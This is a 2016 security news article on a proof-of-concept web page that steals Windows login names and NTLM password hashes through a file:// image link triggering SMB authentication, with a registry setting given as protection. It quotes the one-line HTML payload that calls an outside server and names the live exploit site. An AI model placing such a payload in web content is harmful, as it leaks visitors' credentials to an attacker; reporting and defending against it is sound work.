4 August 2016

Stealing your Windows user credentials just with a website


Stealing your Windows user credentials just with a website

Russian researcher ValdikSS made publicly available a little exploit, which can steal your Windows credentials (login and NTML hash) just by visiting a website. The issue is connected with the way Windows operating system treats file:// URIs. Once spotted, the operating system will send SMB NTLMSSP_NEGOTIATE request to attacker's server, revealing login, domain name and NTLM hash of your password.

Web page with fully working exploit is available here: hxxp://witch.valdikss.org.ru/

Do not visit this page from your corporate computer, as your password might be decrypted.

The page contains an image <img src=”file://witch.valdikss.org.ru/a”>, which triggers SMB negotiations.

Below is a screenshot for a stand-alone workstation:

As you can see from the screenshot, a simple password can be recovered from NTLM hash within several seconds. The collected hashes with strong passwords can be stored and decrypted later.

The exploit works on all modern operating Windows systems, including Windows 10. And it does not matter, which browser you use, as the request is handled by operating system.

The same rule applies for integrated Microsoft account. If you use your Microsoft account to login to your PC, then attackers can steal it too. In this case they might be able to access all Microsoft services, using Live ID, e.g. Skype, OneDrive, etc.

Protection

Use RestrictReceivingNTLMTraffic registry key to disable this behavior.

	 Windows Registry Editor Version 5.00
	 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]
	 "RestrictReceivingNTLMTraffic"=dword:00000002
	 "RestrictSendingNTLMTraffic"=dword:00000002

Back to the list

Latest Posts

Free VPN apps on Google Play turned Android devices into residential proxies

Free VPN apps on Google Play turned Android devices into residential proxies

The threat actor behind this scheme profits by selling access to the residential proxy network to third parties.
28 March 2024
Cyber spies strike Indian government and energy sectors

Cyber spies strike Indian government and energy sectors

The operation involved phishing emails delivering the HackBrowserData info-stealer.
28 March 2024
Spyware makers and state-backed hackers are primary culprits behind rise in zero-day exploits, Google says

Spyware makers and state-backed hackers are primary culprits behind rise in zero-day exploits, Google says

97 zero-day flaws were exploited in-the-wild in 2023, marking an increase of over 50% compared to 2022.
27 March 2024